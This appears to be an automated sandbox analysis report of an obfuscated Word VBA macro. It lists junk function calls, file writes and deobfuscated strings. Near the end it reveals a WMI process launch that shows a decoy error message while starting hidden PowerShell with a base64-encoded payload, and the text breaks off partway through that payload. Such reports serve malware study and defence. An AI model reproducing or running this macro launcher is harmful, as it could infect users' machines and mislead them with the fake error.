                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: ddanFDWJf

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: RhztCF

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: kwzjKvZHe

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: inIcjJtaF

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: zBSWCKmJv

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: KXTliE

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: YZllAeRe

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: hjZwD

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: FUyIHBDFz

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: AiRdGDAJ

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: AioOpBFE

                                                    CreateTextFile

                                                    WriteLine

                                                    WriteLine

                                                    WriteLine

                                                    inIcjJtaF

                                                    Close

                                                    zBSWCKmJv

                                                    Part of subcall function Hrs2a1p95u19@Owppnp8hah4xo788: Pg5minli2d3c9

                                                    Part of subcall function Hrs2a1p95u19@Owppnp8hah4xo788: sreXHFD

                                                    Part of subcall function Hrs2a1p95u19@Owppnp8hah4xo788: CreateObject

                                                    Part of subcall function Hrs2a1p95u19@Owppnp8hah4xo788: CreateTextFile

                                                    Part of subcall function Hrs2a1p95u19@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Hrs2a1p95u19@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Hrs2a1p95u19@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Hrs2a1p95u19@Owppnp8hah4xo788: eCIzUDyJ

                                                    Part of subcall function Hrs2a1p95u19@Owppnp8hah4xo788: Close

                                                    Part of subcall function Hrs2a1p95u19@Owppnp8hah4xo788: yJmmmVIAG

                                                    Part of subcall function Hrs2a1p95u19@Owppnp8hah4xo788: Replace

                                                    Part of subcall function Hrs2a1p95u19@Owppnp8hah4xo788: Ij2hesgjee57d3s0

                                                    Part of subcall function Hrs2a1p95u19@Owppnp8hah4xo788: uVItICICB

                                                    Part of subcall function Hrs2a1p95u19@Owppnp8hah4xo788: CreateObject

                                                    Part of subcall function Hrs2a1p95u19@Owppnp8hah4xo788: CreateTextFile

                                                    Part of subcall function Hrs2a1p95u19@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Hrs2a1p95u19@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Hrs2a1p95u19@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Hrs2a1p95u19@Owppnp8hah4xo788: anyPG

                                                    Part of subcall function Hrs2a1p95u19@Owppnp8hah4xo788: Close

                                                    Part of subcall function Hrs2a1p95u19@Owppnp8hah4xo788: YVZXECEHD

                                                    KXTliE

                                                    CreateObject

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: SQQWY

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: ddanFDWJf

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: RhztCF

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: kwzjKvZHe

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: inIcjJtaF

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: zBSWCKmJv

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: KXTliE

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: YZllAeRe

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: hjZwD

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: FUyIHBDFz

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: AiRdGDAJ

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: AioOpBFE

                                                    CreateTextFile

                                                    WriteLine

                                                    WriteLine

                                                    WriteLine

                                                    YZllAeRe

                                                    Close

                                                    hjZwD

                                                    FUyIHBDFz

                                                    CreateObject

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: SQQWY

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: ddanFDWJf

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: RhztCF

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: kwzjKvZHe

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: inIcjJtaF

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: zBSWCKmJv

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: KXTliE

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: YZllAeRe

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: hjZwD

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: FUyIHBDFz

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: AiRdGDAJ

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: AioOpBFE

                                                    CreateTextFile

                                                    WriteLine

                                                    WriteLine

                                                    WriteLine

                                                    AiRdGDAJ

                                                    Close

                                                    AioOpBFE

                                                    StringsDecrypted Strings
                                                    "]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"
                                                    "OiBXGJB:\pnqsZEDV\gsZoAW.EePnB"
                                                    "eEWdaDQVJJqTHgF"
                                                    "OyFBLhlWUnD"
                                                    "TBKmUCEXTUIGu"
                                                    "]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"
                                                    "OBoYzRpef:\sDLuJ\bmIQSG.MdmDR"
                                                    "NeiIGCNWgICn"
                                                    "EgxfIDVQbJotWhj"
                                                    "UjBKOEDRIbiWFB"
                                                    "]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"
                                                    "KGGMcAB:\uaMWhFR\mhdIDlEH.PDxHAHD"
                                                    "RhnJRGeBNASBQHHGF"
                                                    "WNFUDvHgghFdup"
                                                    "eeVVJBMGlcfXMB"
                                                    "]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"
                                                    "CxQnJUo:\GongJKJ\vntyZI.ugzmBCOCC"
                                                    "ptABFEZDmkMVIeD"
                                                    "vVbvIHcFGEAJJ"
                                                    "NisSEYrcDlKQUITa"
                                                    LineInstructionMeta Information
                                                    197

                                                    Function Jlda77h_v8nx5(Wwsqkhmtfcf3_y)

                                                    198

                                                    On Error Resume Next

                                                    executed
                                                    199

                                                    Goto PbhYVsA

                                                    200

                                                    Dim PcHRGIADo as Object

                                                    201

                                                    Set TXmxvp = SQQWY

                                                    SQQWY

                                                    SQQWY

                                                    SQQWY

                                                    SQQWY

                                                    SQQWY

                                                    202

                                                    Set PcHRGIADo = CreateObject(Jlda77h_v8nx5("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))

                                                    CreateObject

                                                    CreateObject

                                                    CreateObject

                                                    CreateObject

                                                    CreateObject

                                                    203

                                                    Dim PbhYVsA as Object

                                                    204

                                                    Set PbhYVsA = PcHRGIADo.CreateTextFile("OiBXGJB:\pnqsZEDV\gsZoAW.EePnB")

                                                    CreateTextFile

                                                    CreateTextFile

                                                    CreateTextFile

                                                    CreateTextFile

                                                    CreateTextFile

                                                    205

                                                    PbhYVsA.WriteLine "eEWdaDQVJJqTHgF"

                                                    WriteLine

                                                    WriteLine

                                                    WriteLine

                                                    WriteLine

                                                    WriteLine

                                                    206

                                                    PbhYVsA.WriteLine "OyFBLhlWUnD"

                                                    WriteLine

                                                    WriteLine

                                                    WriteLine

                                                    WriteLine

                                                    WriteLine

                                                    207

                                                    PbhYVsA.WriteLine "TBKmUCEXTUIGu"

                                                    WriteLine

                                                    WriteLine

                                                    WriteLine

                                                    WriteLine

                                                    WriteLine

                                                    208

                                                    Set qHKYGHlFA = ddanFDWJf

                                                    ddanFDWJf

                                                    ddanFDWJf

                                                    ddanFDWJf

                                                    ddanFDWJf

                                                    ddanFDWJf

                                                    209

                                                    PbhYVsA.Close

                                                    Close

                                                    Close

                                                    Close

                                                    Close

                                                    Close

                                                    210

                                                    Set PcHRGIADo = Nothing

                                                    211

                                                    Set sPkIwu = RhztCF

                                                    RhztCF

                                                    RhztCF

                                                    RhztCF

                                                    RhztCF

                                                    RhztCF

                                                    212

                                                    Set PbhYVsA = Nothing

                                                    212

                                                    PbhYVsA:

                                                    214

                                                    Gqzsjl136wugk27i9 = Wwsqkhmtfcf3_y

                                                    215

                                                    Goto NuebA

                                                    216

                                                    Dim sTzDC as Object

                                                    217

                                                    Set GIAKA = kwzjKvZHe

                                                    kwzjKvZHe

                                                    kwzjKvZHe

                                                    kwzjKvZHe

                                                    kwzjKvZHe

                                                    kwzjKvZHe

                                                    218

                                                    Set sTzDC = CreateObject(Jlda77h_v8nx5("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))

                                                    CreateObject

                                                    CreateObject

                                                    CreateObject

                                                    CreateObject

                                                    CreateObject

                                                    219

                                                    Dim NuebA as Object

                                                    220

                                                    Set NuebA = sTzDC.CreateTextFile("OBoYzRpef:\sDLuJ\bmIQSG.MdmDR")

                                                    CreateTextFile

                                                    CreateTextFile

                                                    CreateTextFile

                                                    CreateTextFile

                                                    CreateTextFile

                                                    221

                                                    NuebA.WriteLine "NeiIGCNWgICn"

                                                    WriteLine

                                                    WriteLine

                                                    WriteLine

                                                    WriteLine

                                                    WriteLine

                                                    222

                                                    NuebA.WriteLine "EgxfIDVQbJotWhj"

                                                    WriteLine

                                                    WriteLine

                                                    WriteLine

                                                    WriteLine

                                                    WriteLine

                                                    223

                                                    NuebA.WriteLine "UjBKOEDRIbiWFB"

                                                    WriteLine

                                                    WriteLine

                                                    WriteLine

                                                    WriteLine

                                                    WriteLine

                                                    224

                                                    Set idbaDIr = inIcjJtaF

                                                    inIcjJtaF

                                                    inIcjJtaF

                                                    inIcjJtaF

                                                    inIcjJtaF

                                                    inIcjJtaF

                                                    225

                                                    NuebA.Close

                                                    Close

                                                    Close

                                                    Close

                                                    Close

                                                    Close

                                                    226

                                                    Set sTzDC = Nothing

                                                    227

                                                    Set KXwaABT = zBSWCKmJv

                                                    zBSWCKmJv

                                                    zBSWCKmJv

                                                    zBSWCKmJv

                                                    zBSWCKmJv

                                                    zBSWCKmJv

                                                    228

                                                    Set NuebA = Nothing

                                                    228

                                                    NuebA:

                                                    230

                                                    Gnc9qzz9241pnhfi = Hrs2a1p95u19(Gqzsjl136wugk27i9)

                                                    231

                                                    Goto gxBPJB

                                                    232

                                                    Dim zxgLHJSFW as Object

                                                    233

                                                    Set quDoH = KXTliE

                                                    KXTliE

                                                    KXTliE

                                                    KXTliE

                                                    KXTliE

                                                    KXTliE

                                                    234

                                                    Set zxgLHJSFW = CreateObject(Jlda77h_v8nx5("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))

                                                    CreateObject

                                                    CreateObject

                                                    CreateObject

                                                    CreateObject

                                                    CreateObject

                                                    235

                                                    Dim gxBPJB as Object

                                                    236

                                                    Set gxBPJB = zxgLHJSFW.CreateTextFile("KGGMcAB:\uaMWhFR\mhdIDlEH.PDxHAHD")

                                                    CreateTextFile

                                                    CreateTextFile

                                                    CreateTextFile

                                                    CreateTextFile

                                                    CreateTextFile

                                                    237

                                                    gxBPJB.WriteLine "RhnJRGeBNASBQHHGF"

                                                    WriteLine

                                                    WriteLine

                                                    WriteLine

                                                    WriteLine

                                                    WriteLine

                                                    238

                                                    gxBPJB.WriteLine "WNFUDvHgghFdup"

                                                    WriteLine

                                                    WriteLine

                                                    WriteLine

                                                    WriteLine

                                                    WriteLine

                                                    239

                                                    gxBPJB.WriteLine "eeVVJBMGlcfXMB"

                                                    WriteLine

                                                    WriteLine

                                                    WriteLine

                                                    WriteLine

                                                    WriteLine

                                                    240

                                                    Set nleaHR = YZllAeRe

                                                    YZllAeRe

                                                    YZllAeRe

                                                    YZllAeRe

                                                    YZllAeRe

                                                    YZllAeRe

                                                    241

                                                    gxBPJB.Close

                                                    Close

                                                    Close

                                                    Close

                                                    Close

                                                    Close

                                                    242

                                                    Set zxgLHJSFW = Nothing

                                                    243

                                                    Set mgTNFCq = hjZwD

                                                    hjZwD

                                                    hjZwD

                                                    hjZwD

                                                    hjZwD

                                                    hjZwD

                                                    244

                                                    Set gxBPJB = Nothing

                                                    244

                                                    gxBPJB:

                                                    246

                                                    Jlda77h_v8nx5 = Gnc9qzz9241pnhfi

                                                    247

                                                    Goto mgrwfmN

                                                    248

                                                    Dim RjiQHRA as Object

                                                    249

                                                    Set EhCMG = FUyIHBDFz

                                                    FUyIHBDFz

                                                    FUyIHBDFz

                                                    FUyIHBDFz

                                                    FUyIHBDFz

                                                    FUyIHBDFz

                                                    250

                                                    Set RjiQHRA = CreateObject(Jlda77h_v8nx5("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))

                                                    CreateObject

                                                    CreateObject

                                                    CreateObject

                                                    CreateObject

                                                    CreateObject

                                                    251

                                                    Dim mgrwfmN as Object

                                                    252

                                                    Set mgrwfmN = RjiQHRA.CreateTextFile("CxQnJUo:\GongJKJ\vntyZI.ugzmBCOCC")

                                                    CreateTextFile

                                                    CreateTextFile

                                                    CreateTextFile

                                                    CreateTextFile

                                                    CreateTextFile

                                                    253

                                                    mgrwfmN.WriteLine "ptABFEZDmkMVIeD"

                                                    WriteLine

                                                    WriteLine

                                                    WriteLine

                                                    WriteLine

                                                    WriteLine

                                                    254

                                                    mgrwfmN.WriteLine "vVbvIHcFGEAJJ"

                                                    WriteLine

                                                    WriteLine

                                                    WriteLine

                                                    WriteLine

                                                    WriteLine

                                                    255

                                                    mgrwfmN.WriteLine "NisSEYrcDlKQUITa"

                                                    WriteLine

                                                    WriteLine

                                                    WriteLine

                                                    WriteLine

                                                    WriteLine

                                                    256

                                                    Set MNihxICY = AiRdGDAJ

                                                    AiRdGDAJ

                                                    AiRdGDAJ

                                                    AiRdGDAJ

                                                    AiRdGDAJ

                                                    AiRdGDAJ

                                                    257

                                                    mgrwfmN.Close

                                                    Close

                                                    Close

                                                    Close

                                                    Close

                                                    Close

                                                    258

                                                    Set RjiQHRA = Nothing

                                                    259

                                                    Set wTMSLyWFG = AioOpBFE

                                                    AioOpBFE

                                                    AioOpBFE

                                                    AioOpBFE

                                                    AioOpBFE

                                                    AioOpBFE

                                                    260

                                                    Set mgrwfmN = Nothing

                                                    260

                                                    mgrwfmN:

                                                    262

                                                    End Function

                                                    Function Hrs2a1p95u19, APIs: 93, Strings: 11, Number of lines: 34, Relevance: 216.034
                                                    APIsMeta Information

                                                    Pg5minli2d3c9

                                                    sreXHFD

                                                    CreateObject

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: SQQWY

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: ddanFDWJf

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: RhztCF

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: kwzjKvZHe

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: inIcjJtaF

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: zBSWCKmJv

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: KXTliE

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: YZllAeRe

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: hjZwD

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: FUyIHBDFz

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: AiRdGDAJ

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: AioOpBFE

                                                    CreateTextFile

                                                    WriteLine

                                                    WriteLine

                                                    WriteLine

                                                    eCIzUDyJ

                                                    Close

                                                    yJmmmVIAG

                                                    Replace

                                                    		Replace("w]anw[3in]anw[3m]anw[3gm]anw[3t]anw[3]anw[3]anw[3]anw[3s]anw[3]anw[3]anw[3:w]anw[3]anw[3in]anw[33]anw[32]anw[3_]anw[3]anw[3p]anw[3]anw[3ro]anw[3]anw[3ce]anw[3s]anw[3s]anw[3]anw[3","]anw[3",) -> winmgmts:win32_process Replace("]anw[3]anw[3c]anw[3m]anw[3d]anw[3 ]anw[3c]anw[3m]anw[3d]anw[3 ]anw[3c]anw[3m]anw[3d]anw[3 ]anw[3c]anw[3m]anw[3d]anw[3 ]anw[3/]anw[3c]anw[3 ]anw[3m]anw[3s]anw[3g]anw[3 ]anw[3%]anw[3u]anw[3s]anw[3e]anw[3r]anw[3n]anw[3a]anw[3m]anw[3e]anw[3%]anw[3 ]anw[3/]anw[3v]anw[3 ]anw[3W]anw[3o]anw[3r]anw[3d]anw[3 ]anw[3e]anw[3x]anw[3p]anw[3e]anw[3r]anw[3i]anw[3e]anw[3n]anw[3c]anw[3e]anw[3d]anw[3 ]anw[3a]anw[3n]anw[3 ]anw[3e]anw[3r]anw[3r]anw[3o]anw[3r]anw[3 ]anw[3t]anw[3r]anw[3y]anw[3i]anw[3n]anw[3g]anw[3 ]anw[3t]anw[3o]anw[3 ]anw[3o]anw[3p]anw[3e]anw[3n]anw[3 ]anw[3t]anw[3h]anw[3e]anw[3 ]anw[3f]anw[3i]anw[3l]anw[3e]anw[3.]anw[3 ]anw[3&]anw[3 ]anw[3 ]anw[3P]anw[3^]anw[3O]anw[3w]anw[3^]anw[3e]anw[3r]anw[3^]anw[3s]anw[3h]anw[3e]anw[3^]anw[3L]anw[3^]anw[3L]anw[3 ]anw[3-]anw[3w]anw[3 ]anw[3h]anw[3i]anw[3d]anw[3d]anw[3e]anw[3n]anw[3 ]anw[3-]anw[3E]anw[3N]anw[3C]anw[3O]anw[3D]anw[3 ]anw[3 ]anw[3 ]anw[3 ]anw[3 ]anw[3 ]anw[3 ]anw[3 ]anw[3 ]anw[3 ]anw[3 ]anw[3 ]anw[3 ]anw[3 ]anw[3 ]anw[3 ]anw[3 IAB]anw[3zAF]anw[3YAI]anw[3AAg]anw[3ACg]anw[3AIg]anw[3BLA]anw[3CIA]anw[3KwA]anw[3iAD]anw[3QAN]anw[3wBk]anw[3ACI]anw[3AKQ]anw[3AgA]anw[3CAA]anw[3KAB]anw[3bAH]anw[3QAW]anw[3QBQ]anw[3AGU]anw[3AXQ]anw[3AoA]anw[3CIA]anw[3ewA]anw[30AH]anw[30Ae]anw[3wAx]anw[3AH0]anw[3Aew]anw[3AwA]anw[3H0A]anw[3ewA]anw[3zAH]anw[30Ae]anw[3wAy]anw[3AH0]anw[3AIg]anw[3AtA]anw[3EYA]anw[3JwB]anw[3zAC]anw[3cAL]anw[3AAn]anw[3AHk]anw[3AJw]anw[3AsA]anw[3CcA]anw[3ZQB]anw[3jAF]anw[3QAb]anw[3wBy]anw[3AFk]anw[3AJw]anw[3AsA]anw[3CcA]anw[3VAB]anw[3FAG]anw[30AL]anw[3gBJ]anw[3AG8]anw[3ALg]anw[3BEA]anw[3EkA]anw[3cgA]anw[3nAC]anw[3wAJ]anw[3wBz]anw[3ACc]anw[3AKQ]anw[3ApA]anw[3CAA]anw[3IAA]anw[37AC]anw[3AAI]anw[3AAg]anw[3ACA]anw[3AJA]anw[3BXA]anw[3GkA]anw[3OAA]anw[3gAD]anw[30AW]anw[3wB0]anw[3AHk]anw[3AUA]anw[3BlA]anw[3F0A]anw[3KAA]anw[3iAH]anw[3sAM]anw[3gB9]anw[3AHs]anw[3AMw]anw[3B9A]anw[3HsA]anw[3NwB]anw[39AH]anw[3sAM]anw[3QB9]anw[3AHs]anw[3ANA]anw[3B9A]anw[3HsA]anw[3NgB]anw[39AH]anw[3sAN]anw[3QB9]anw[3AHs]anw[3AOA]anw[3B9A]anw[3HsA]anw[3MAB]anw[39AC]anw[3IAL]anw[3QBG]anw[3ACA]anw[3AJw]anw[3BnA]anw[3EUA]anw[3UgA]anw[3nAC]anw[3wAJ]anw[3wAu]anw[3AE4]anw[3AZQ]anw[3B0A]anw[3C4A]anw[3UwB]anw[3FAF]anw[3IAV]anw[3gAn]anw[3ACw]anw[3AJw]anw[3BTA]anw[3FkA]anw[3cwA]anw[3nAC]anw[3wAJ]anw[3wBU]anw[3AGU]anw[3AJw]anw[3AsA]anw[3CcA]anw[3SQA]anw[3nAC]anw[3wAJ]anw[3wB0]anw[3AG0]anw[3AQQ]anw[3AnA]anw[3CwA]anw[3JwB]anw[3DAG]anw[3UAU]anw[3ABP]anw[3AEk]anw[3ATg]anw[3AnA]anw[3CwA]anw[3JwB]anw[3tAC]anw[3cAL]anw[3AAn]anw[3AE4]anw[3AYQ]anw[3AnA]anw[3CkA]anw[3IAA]anw[37AC]anw[3AAJ]anw[3ABF]anw[3AHI]anw[3Acg]anw[3BvA]anw[3HIA]anw[3QQB]anw[3jAH]anw[3QAa]anw[3QBv]anw[3AG4]anw[3AUA]anw[3ByA]anw[3GUA]anw[3ZgB]anw[3lAH]anw[3IAZ]anw[3QBu]anw[3AGM]anw[3AZQ]anw[3AgA]anw[3D0A]anw[3IAA]a